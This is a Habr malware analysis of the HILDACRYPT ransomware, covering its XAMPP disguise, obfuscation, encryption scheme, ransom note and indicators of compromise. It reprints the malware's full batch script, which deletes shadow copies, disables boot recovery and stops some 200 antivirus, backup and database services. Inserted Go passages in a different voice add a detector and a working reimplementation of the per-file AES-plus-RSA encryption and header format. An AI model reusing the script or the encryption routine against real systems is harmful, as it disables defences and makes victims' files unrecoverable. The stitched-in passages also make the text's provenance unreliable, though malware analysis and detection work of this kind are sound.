Hello, Habr! Once again we are looking at one of the newest malware samples of the ransomware type. HILDACRYPT is a new ransomware, a member of the Hilda family discovered in August 2019 and named after the Netflix cartoon that was used to distribute it. Today we go through the technical features of this updated ransomware.

In the first version of the Hilda ransomware, a link to the YouTube trailer of the animated series was embedded in the ransom note. HILDACRYPT masquerades as a legitimate XAMPP installer, the easy-to-install Apache distribution that bundles MariaDB, PHP and Perl. The cryptolocker, however, uses a different file name: xamp. In addition, the ransomware file carries no digital signature.
Static analysis
The ransomware is packed into a PE32 .NET file built for MS Windows. Its size is 135,168 bytes. Both the main program code and the protector code are written in C#. According to the compilation timestamp, the binary was built on September 14, 2019.

According to Detect It Easy, the ransomware is protected with Confuser and ConfuserEx, but these are essentially one and the same obfuscator: ConfuserEx is the successor of Confuser, so their code signatures are similar.

In fact, HILDACRYPT is packed with ConfuserEx.

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Attack vector
The ransomware was most likely found on one of the web programming sites, posing as a legitimate XAMPP program.
The entire infection chain can be seen in the .
Obfuscation
The ransomware's strings are stored in encrypted form. Once unpacked, HILDACRYPT decrypts them using Base64 and AES-256-CBC.

Behavior
First, the ransomware creates a folder under %AppData%\Roaming whose name is a randomly generated GUID (Globally Unique Identifier). It drops a .bat file there and launches it through cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

The batch script is run to disable system features and services.

The script is a long list of commands that destroy shadow copies and stop SQL Server, backup and antivirus services.
For example, it tries (unsuccessfully) to stop the Acronis Backup services. It also targets backup and antivirus products from the following vendors: Veeam, Sophos, Kaspersky, McAfee and others.
```batch
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop "Sophos Device Control Service" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Zoolz 2 Service" /y
net stop McTaskManager /y
net stop "Sophos AutoUpdate Service" /y
net stop "Sophos System Protection Service" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Symantec System Recovery" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Sophos Health Service" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Sophos Message Router" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Sophos Clean Service" /y
net stop swi_update_64 /y
net stop "Sophos Web Control Service" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Veeam Backup Catalog Data Service" /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop "Sophos MCS Client" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop "SQLsafe Backup Service" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Sophos Safestore Service" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Sophos File Scanner Service" /y
net stop "Sophos Agent" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Enterprise Client Service" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "SQL Backups" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Sophos MCS Agent" /y
net stop RESvc /y
net stop "Acronis VSS Provider" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
```
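The behaviour above (a .bat dropped into a GUID-named folder under %AppData%\Roaming and launched with cmd.exe /c, followed by the vssadmin, bcdedit and net stop commands of the script) is noisy enough to catch from process-creation telemetry alone. The following Go program is an added example written for this article, not code from the page or from the malware: it runs a small rule set over a constructed set of process-creation events (the ProcEvent fields, the GUID folder path, the PIDs and the event order are all assumptions) and reports shadow-copy and boot-recovery tampering, the batch launch from a GUID folder, and a burst of net stop commands against backup, antivirus and database services issued from one parent process.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ProcEvent is a constructed, minimal process-creation record: the fields a
// Sysmon Event ID 1 or Windows 4688 event would provide (names are assumptions).
type ProcEvent struct {
	ParentPID   int
	Image       string
	CommandLine string
	CurrentDir  string
}

type Finding struct {
	Rule   string
	Detail string
}

var (
	// GUID-named folder directly under AppData\Roaming, as HILDACRYPT creates it.
	reGUIDDir = regexp.MustCompile(`(?i)\\AppData\\Roaming\\\{?[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?\\?$`)
	// cmd.exe /c <name>.bat; the page's sample passes the .bat by bare name, so the
	// drop location is only visible through CurrentDir, never through the command line.
	reBat = regexp.MustCompile(`(?i)/c\s+"?[^\s"]+\.bat"?`)
	// net stop <service> or net stop "<service with spaces>"
	reNetStop = regexp.MustCompile(`(?i)\bnet1?(?:\.exe)?"?\s+stop\s+("[^"]+"|\S+)`)
)

// Substrings of the service names the kill script above targets (backup, AV,
// database, VSS writers). Deliberately vendor-level rather than the full list.
var protectedMarkers = []string{"veeam", "sophos", "acronis", "acrsch", "backupexec", "kav", "klnagent", "avp", "mcafee", "mcshield", "mfe", "mssql", "sqlagent", "sqlwriter", "vss", "wbengine", "sav"}

const netStopThreshold = 5 // protected-service stops from one parent before alerting

func isImage(img, name string) bool {
	img = strings.ToLower(img)
	return img == name || strings.HasSuffix(img, `\`+name)
}

// Detect applies the rules to a timeline of events and returns the findings.
func Detect(events []ProcEvent) []Finding {
	var out []Finding
	stops := map[int]int{}
	var parents []int // keeps the report order deterministic
	for _, ev := range events {
		cl := strings.ToLower(ev.CommandLine)
		switch {
		case isImage(ev.Image, "vssadmin.exe") && (strings.Contains(cl, "delete shadows") || strings.Contains(cl, "resize shadowstorage")):
			out = append(out, Finding{"shadow-copy tampering", ev.CommandLine})
		case isImage(ev.Image, "bcdedit.exe") && (strings.Contains(cl, "recoveryenabled no") || strings.Contains(cl, "bootstatuspolicy ignoreallfailures")):
			out = append(out, Finding{"boot-recovery tampering", ev.CommandLine})
		case isImage(ev.Image, "cmd.exe") && reBat.MatchString(ev.CommandLine) && reGUIDDir.MatchString(ev.CurrentDir):
			out = append(out, Finding{"batch file run from GUID folder under AppData\\Roaming", ev.CurrentDir + " " + ev.CommandLine})
		case isImage(ev.Image, "net.exe") || isImage(ev.Image, "net1.exe"):
			m := reNetStop.FindStringSubmatch(ev.CommandLine)
			if m == nil {
				continue
			}
			svc := strings.ToLower(strings.Trim(m[1], `"`))
			for _, k := range protectedMarkers {
				if strings.Contains(svc, k) {
					if stops[ev.ParentPID] == 0 {
						parents = append(parents, ev.ParentPID)
					}
					stops[ev.ParentPID]++
					break
				}
			}
		}
	}
	for _, p := range parents {
		if stops[p] >= netStopThreshold {
			out = append(out, Finding{"mass stop of backup/AV/DB services", fmt.Sprintf("parent PID %d stopped %d protected services", p, stops[p])})
		}
	}
	return out
}

// SampleEvents is a constructed timeline, not a capture: the launcher, a slice of
// the kill script run from it (parent PID 4412), one routine net stop and one benign process.
func SampleEvents() []ProcEvent {
	dir := `C:\Users\alice\AppData\Roaming\6f1c2a8e-3b4d-4c5e-9f01-2a3b4c5d6e7f\`
	ev := []ProcEvent{
		{3008, `C:\Windows\System32\cmd.exe`, `cmd.exe /c JKfgkgj3hjgfhjka.bat & exit`, dir},
		{4412, `C:\Windows\System32\vssadmin.exe`, `vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB`, dir},
		{4412, `C:\Windows\System32\bcdedit.exe`, `bcdedit /set {default} recoveryenabled No`, dir},
		{4412, `C:\Windows\System32\bcdedit.exe`, `bcdedit /set {default} bootstatuspolicy ignoreallfailures`, dir},
		{4412, `C:\Windows\System32\vssadmin.exe`, `vssadmin Delete Shadows /all /quiet`, dir},
		{7001, `C:\Windows\System32\net.exe`, `net stop Spooler /y`, `C:\Windows\system32\`},
		{2550, `C:\Windows\System32\notepad.exe`, `notepad.exe notes.txt`, `C:\Users\alice\Documents\`},
	}
	for _, s := range []string{`"Sophos Device Control Service"`, `SAVService`, `VeeamNFSSvc`, `AcrSch2Svc`, `MSSQLSERVER`, `McShield`} {
		ev = append(ev, ProcEvent{4412, `C:\Windows\System32\net.exe`, "net stop " + s + " /y", dir})
	}
	return ev
}

func main() {
	for _, f := range Detect(SampleEvents()) {
		fmt.Printf("[%s] %s\n", f.Rule, f.Detail)
	}
}
```

Two points are worth keeping from these rules: the sample command line passes the .bat by bare name, so the GUID drop folder is only visible through the process's current directory (Sysmon's CurrentDirectory), not through the command line; and a single net stop is routine administration, so the rule counts stops of protected services per parent process and alerts only once a threshold is crossed.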
Once the services and processes listed above have been stopped, the cryptolocker collects information about all running processes with the tasklist command, to make sure every service it cares about is down:
tasklist /v /fo csv
This command prints the complete list of running processes, one per line, as comma-separated quoted fields. The row below comes from a Russian-locale host; its localized fields are rendered in English here:
"csrss.exe","448","Services","0","1,896 K","Unknown","N/A","0:00:03","N/A"
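To make concrete what the malware learns from this step (and what a responder can check afterwards), here is an added Go example, not code from the article: it parses tasklist /v /fo csv output and reports which of a watch list of protection-related processes are still running. The sample output is constructed, not captured from an infected host; it mixes a Russian-locale row of the kind shown above with English-locale rows, and it includes a memory figure with embedded commas to show why the output must be read with a real CSV parser rather than split on commas.

```go
package main

import (
	"encoding/csv"
	"fmt"
	"strconv"
	"strings"
)

// Process is one row of `tasklist /v /fo csv`. The column order is fixed
// (Image Name, PID, Session Name, Session#, Mem Usage, Status, User Name,
// CPU Time, Window Title) while the header text, the thousands separator and
// the N/A marker follow the system locale, so rows are read by position.
type Process struct {
	Image   string
	PID     int
	Session string
	MemKB   int
	Status  string
	User    string
	CPUTime string
	Title   string
}

// SampleTasklist is constructed output, not a capture: an English header, one
// row in the Russian-locale format seen in the article, and English-locale rows.
const SampleTasklist = `"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"csrss.exe","448","Services","0","1 896 КБ","Unknown","Н/Д","0:00:03","Н/Д"
"SAVService.exe","2212","Services","0","12,044 K","Unknown","NT AUTHORITY\SYSTEM","0:00:01","N/A"
"sqlservr.exe","3120","Services","0","1,203,456 K","Unknown","NT Service\MSSQLSERVER","0:12:44","N/A"
"notepad.exe","5008","Console","1","9,812 K","Running","LAB\alice","0:00:00","Untitled - Notepad"
`

// ParseTasklist reads the CSV; quoted fields may contain commas ("1,203,456 K"),
// which is why splitting on "," is wrong.
func ParseTasklist(raw string) ([]Process, error) {
	r := csv.NewReader(strings.NewReader(raw))
	r.FieldsPerRecord = 9
	rows, err := r.ReadAll()
	if err != nil {
		return nil, err
	}
	var out []Process
	for _, f := range rows {
		pid, err := strconv.Atoi(f[1])
		if err != nil {
			continue // header row (in any locale): the PID field is not numeric
		}
		out = append(out, Process{Image: f[0], PID: pid, Session: f[2], MemKB: memKB(f[4]),
			Status: f[5], User: f[6], CPUTime: f[7], Title: f[8]})
	}
	return out, nil
}

// memKB keeps only the digits of a locale-formatted figure ("1,203,456 K", "1 896 КБ").
func memKB(s string) int {
	var b strings.Builder
	for _, c := range s {
		if c >= '0' && c <= '9' {
			b.WriteRune(c)
		}
	}
	n, _ := strconv.Atoi(b.String())
	return n
}

// StillRunning returns which of the watched image names are present. This is the
// check the ransomware performs after its kill script, and the same check a
// responder can run to confirm which defences survived.
func StillRunning(procs []Process, watch []string) []string {
	seen := map[string]bool{}
	for _, p := range procs {
		seen[strings.ToLower(p.Image)] = true
	}
	var alive []string
	for _, w := range watch {
		if seen[strings.ToLower(w)] {
			alive = append(alive, w)
		}
	}
	return alive
}

func main() {
	procs, err := ParseTasklist(SampleTasklist)
	if err != nil {
		panic(err)
	}
	fmt.Println(StillRunning(procs, []string{"SAVService.exe", "sqlservr.exe", "ekrn.exe", "VeeamBackupSvc.exe"}))
}
```

Real tasklist output uses CRLF line endings and, on localized systems, a non-breaking space as the thousands separator; encoding/csv accepts both line endings, and memKB discards every non-digit, so neither affects the parse.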

After this check, the ransomware starts the encryption process.
Encryption
File encryption
HILDACRYPT walks the entire contents of the hard drives, skipping the Recycle.Bin folder and Reference Assemblies\Microsoft. The latter holds dll, pdb and wdg files that .NET applications depend on, and encrypting them could interfere with the ransomware's own operation. Files to encrypt are selected by the following list of extensions:
".vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md"
The ransomware encrypts user files with the AES-256-CBC algorithm. The key is 256 bits long and the initialization vector (IV) is 16 bytes.

In the screenshots below, the values of byte_2 and byte_1 are filled with random bytes obtained through GetBytes().

Key

IV

Encrypted files get the extension HCY!... Here is an example of an encrypted file. The key and IV shown above were generated for this particular file.

Key encryption
The cryptolocker stores the generated AES key inside the encrypted file. The first part of the encrypted file is a header holding fields such as HILDACRYPT, KEY, IV and FileLen in XML format; it looks like this:

The AES key and IV are encrypted with RSA-2048 and the result is Base64-encoded. The RSA public key is stored in the body of the cryptolocker as one of the encrypted strings, in XML format:
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
The RSA public key is used to encrypt the per-file AES key. It is Base64-encoded and consists of a modulus and the public exponent 65537 (AQAB in Base64). Decryption requires the matching RSA private key, which only the attacker holds.
After RSA encryption, the AES key is Base64-encoded and stored in the encrypted file.
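The scheme described in this section (a random AES-256 key and IV per file, the key wrapped with the embedded RSA-2048 public key, the wrapped key and the IV Base64-encoded into an XML header written in front of the ciphertext) can be reproduced end to end in a few dozen lines. The following Go program is an added example written for this article, not HILDACRYPT's code or its exact file format: the element layout of the header, the newline that terminates it, and PKCS#1 v1.5 as the RSA padding are assumptions. It also parses the .NET RSAKeyValue XML form of the public key (Base64 modulus plus the exponent AQAB, i.e. 65537), and its aesCBC routine in decrypt mode is the Base64 + AES-256-CBC string-decryption step mentioned in the Obfuscation section. DecryptFile makes the section's main point concrete: without the private key the wrapped AES key in the header cannot be recovered, so neither can the file.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"encoding/base64"
	"encoding/xml"
	"errors"
	"math/big"
)

// RSAKeyValue is the .NET RSA.ToXmlString(false) layout: Base64 modulus, Base64 exponent (AQAB = 65537).
type RSAKeyValue struct {
	XMLName  xml.Name `xml:"RSAKeyValue"`
	Modulus  string   `xml:"Modulus"`
	Exponent string   `xml:"Exponent"`
}

// Header carries the per-file fields the article names; nesting and the trailing newline are assumptions.
type Header struct {
	XMLName xml.Name `xml:"HILDACRYPT"`
	Key     string   `xml:"KEY"` // Base64(RSA-2048 PKCS#1 v1.5 wrap of the AES key)
	IV      string   `xml:"IV"`  // Base64(16-byte IV)
	FileLen int      `xml:"FileLen"`
}

func ParseDotNetPublicKey(s string) (*rsa.PublicKey, error) {
	var kv RSAKeyValue
	if err := xml.Unmarshal([]byte(s), &kv); err != nil {
		return nil, err
	}
	n, err1 := base64.StdEncoding.DecodeString(kv.Modulus)
	e, err2 := base64.StdEncoding.DecodeString(kv.Exponent)
	if err1 != nil || err2 != nil {
		return nil, errors.New("bad Base64 in RSAKeyValue")
	}
	return &rsa.PublicKey{N: new(big.Int).SetBytes(n), E: int(new(big.Int).SetBytes(e).Int64())}, nil
}

// aesCBC: AES-256-CBC with PKCS#7 padding (the .NET default) in either direction.
func aesCBC(key, iv, in []byte, encrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
	if err != nil {
		return nil, err
	}
	if encrypt {
		n := aes.BlockSize - len(in)%aes.BlockSize
		in = append(in[:len(in):len(in)], bytes.Repeat([]byte{byte(n)}, n)...) // copies, never pads in place
		out := make([]byte, len(in))
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, in)
		return out, nil
	}
	if len(in) == 0 || len(in)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of blocks")
	}
	out := make([]byte, len(in))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, in)
	n := int(out[len(out)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(out[len(out)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	return out[:len(out)-n], nil
}

// EncryptFile: fresh random key and IV per file, key wrapped with the RSA public key, XML header then ciphertext.
func EncryptFile(pub *rsa.PublicKey, plain []byte) ([]byte, error) {
	buf := make([]byte, 48) // 32-byte AES-256 key followed by 16-byte IV, from crypto/rand (cf. GetBytes() above)
	rand.Read(buf)
	key, iv := buf[:32], buf[32:]
	wrapped, err := rsa.EncryptPKCS1v15(rand.Reader, pub, key)
	if err != nil {
		return nil, err
	}
	ct, _ := aesCBC(key, iv, plain, true) // cannot fail: the key length is fixed above
	hdr, _ := xml.Marshal(Header{Key: base64.StdEncoding.EncodeToString(wrapped), IV: base64.StdEncoding.EncodeToString(iv), FileLen: len(plain)})
	return append(append(hdr, '\n'), ct...), nil
}

// DecryptFile needs the RSA private key; without it the wrapped AES key, and so the file, stays unrecoverable.
func DecryptFile(priv *rsa.PrivateKey, blob []byte) ([]byte, error) {
	i := bytes.IndexByte(blob, '\n')
	var h Header
	if i < 0 || xml.Unmarshal(blob[:i], &h) != nil {
		return nil, errors.New("missing or malformed header")
	}
	wrapped, err1 := base64.StdEncoding.DecodeString(h.Key)
	iv, err2 := base64.StdEncoding.DecodeString(h.IV)
	if err1 != nil || err2 != nil || len(iv) != aes.BlockSize {
		return nil, errors.New("bad header fields")
	}
	key, err := rsa.DecryptPKCS1v15(rand.Reader, priv, wrapped)
	if err != nil {
		return nil, err // wrong private key: PKCS#1 unpadding fails
	}
	return aesCBC(key, iv, blob[i+1:], false)
}
```

When checking a real sample against this model, three things matter most: whether the key and IV are genuinely fresh per file (the page's screenshots show them drawn from GetBytes(); a key reused with a reused IV would leak equal plaintext blocks), which padding the .NET RSA call actually selects (RSACryptoServiceProvider.Encrypt with fOAEP=false is PKCS#1 v1.5), and whether FileLen in the header agrees with the padded ciphertext length, which lets a decryptor tell a truncated file from a corrupted one.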
Ransom note
Once encryption is complete, HILDACRYPT writes an HTML file to the folder where it encrypted the files. The ransom note contains two e-mail addresses through which the victim can contact the attacker:
- hildalolilovesyou@airmail.cc
- hildalolilovesyou@memeware.net

The ransom note also contains the line "No loli is safe;)", a reference to anime and manga characters drawn as young girls, which are banned in Japan.
Conclusion
HILDACRYPT, a new ransomware family, has released a new version. Its encryption model prevents the victim from decrypting the files the ransomware has encrypted. The cryptolocker uses active protection methods to disable protection services belonging to backup systems and antivirus solutions. The author of HILDACRYPT is a fan of the animated series Hilda, shown on Netflix; a link to its trailer was included in the ransom note of the previous version of the program.
As before, our products can protect your computer from the HILDACRYPT ransomware, and service providers can use them to protect their customers. Protection comes from the fact that these solutions include not only backup but also our integrated protection module, built on a machine-learning model and behavioural heuristics, a technology that can withstand zero-day ransomware threats like no other.
Indicators of compromise
File extension HCY!
HIDACRYPT ReadMe.html
xamp.exe with a single letter "p" and no digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com
